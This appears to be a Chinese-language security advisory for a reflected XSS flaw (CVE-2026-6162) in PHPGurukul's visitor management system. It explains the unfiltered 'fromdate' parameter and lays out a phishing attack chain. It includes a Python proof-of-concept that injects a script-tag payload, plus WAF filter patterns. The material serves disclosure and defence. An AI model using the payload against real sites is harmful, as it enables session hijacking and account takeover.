CVE-2026-6162 PHPGurukul访客管理系统XSS漏洞

漏洞信息

漏洞编号

CVE-2026-6162

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

PHPGurukul Company Visitor Management System

漏洞概述

PHPGurukul Company Visitor Management System 2.0版本中存在一处跨站脚本（XSS）漏洞。该漏洞源于`/bwdates-reports-details.php`文件未对`fromdate`参数进行有效的安全过滤。由于缺乏适当的输出编码，攻击者能够通过构造包含恶意JavaScript代码的URL参数，远程发起攻击。当低权限用户访问并交互（如点击链接）时，恶意脚本将在受害者浏览器中执行。此漏洞虽被评定为低危（CVSS 3.5），但仍可能被利用于窃取用户凭证或篡改页面内容。鉴于相关利用代码已公开，管理员需提高警惕。

技术细节

漏洞的核心在于PHPGurukul Company Visitor Management System 2.0在处理报表详情页请求时，直接将用户输入的`fromdate`参数反射回响应页面，未实施任何HTML实体编码或输入清洗机制。攻击者可以利用这一缺陷，设计特制的恶意链接，将`<script>`等危险标签作为参数值传递。

根据CVSS向量分析，该攻击需要低权限（PR:L）和用户交互（UI:R），典型的攻击场景是钓鱼攻击。攻击者诱导受害者点击恶意链接，服务器接收请求后，将参数值未经处理地嵌入HTML源码中。受害者的浏览器解析HTML时，会执行其中的恶意脚本。一旦脚本运行，攻击者即可在受害者浏览器上下文中执行任意操作，例如窃取Session Cookie导致账户被劫持，或者重定向到恶意网站。由于该漏洞位于报表模块，常被管理员使用，一旦针对管理员进行攻击，可能导致后台权限的间接获取，从而提升攻击危害等级。修复此问题需在服务器端对`fromdate`参数进行白名单验证，并使用`htmlspecialchars`等函数对输出内容进行转义。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用PHPGurukul Company Visitor Management System 2.0，并确认存在/bwdates-reports-details.php接口。

STEP 2

构造载荷

攻击者编写包含恶意JavaScript代码的XSS Payload，例如<script>alert(1)</script>。

STEP 3

传递载荷

攻击者将Payload编码并放入`fromdate`参数中，生成恶意URL，并通过邮件或即时通讯工具发送给目标用户。

STEP 4

触发漏洞

受害者（通常是拥有低权限的员工）点击链接，浏览器向服务器发送请求。

STEP 5

执行攻击

服务器将未经过滤的参数值返回给浏览器，浏览器解析并执行恶意脚本，导致Cookie被盗或页面被篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-6162
# Python script to demonstrate the XSS vulnerability

import requests

target_url = "http://target-site.com/bwdates-reports-details.php"
payload = "<script>alert('CVE-2026-6162_XSS');</script>"

# Inject payload into the 'fromdate' parameter
params = {
    "fromdate": payload
}

try:
    response = requests.get(target_url, params=params)
    # Check if the payload is reflected in the response without encoding
    if payload in response.text:
        print("[+] Vulnerability Confirmed: XSS payload is reflected in the response.")
    else:
        print("[-] Vulnerability not detected or payload might be encoded.")
except Exception as e:
    print(f"Error: {e}")

影响范围

PHPGurukul Company Visitor Management System 2.0

防御指南

临时缓解措施

在官方补丁发布前，建议管理员暂时限制对该报表页面的访问权限，或通过反向代理/WAF规则拦截包含`<script`、`onerror=`、`javascript:`等特征的请求参数，以降低被攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6162
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6162
3 Details https://www.cvedetails.com/cve/CVE-2026-6162/
4 VulDB https://vuldb.com/cve/CVE-2026-6162
5 Link https://github.com/f1rstb100d/CVE/issues/44
6 Link https://phpgurukul.com/
7 Link https://vuldb.com/submit/797171
8 Link https://vuldb.com/vuln/357048
9 Link https://vuldb.com/vuln/357048/cti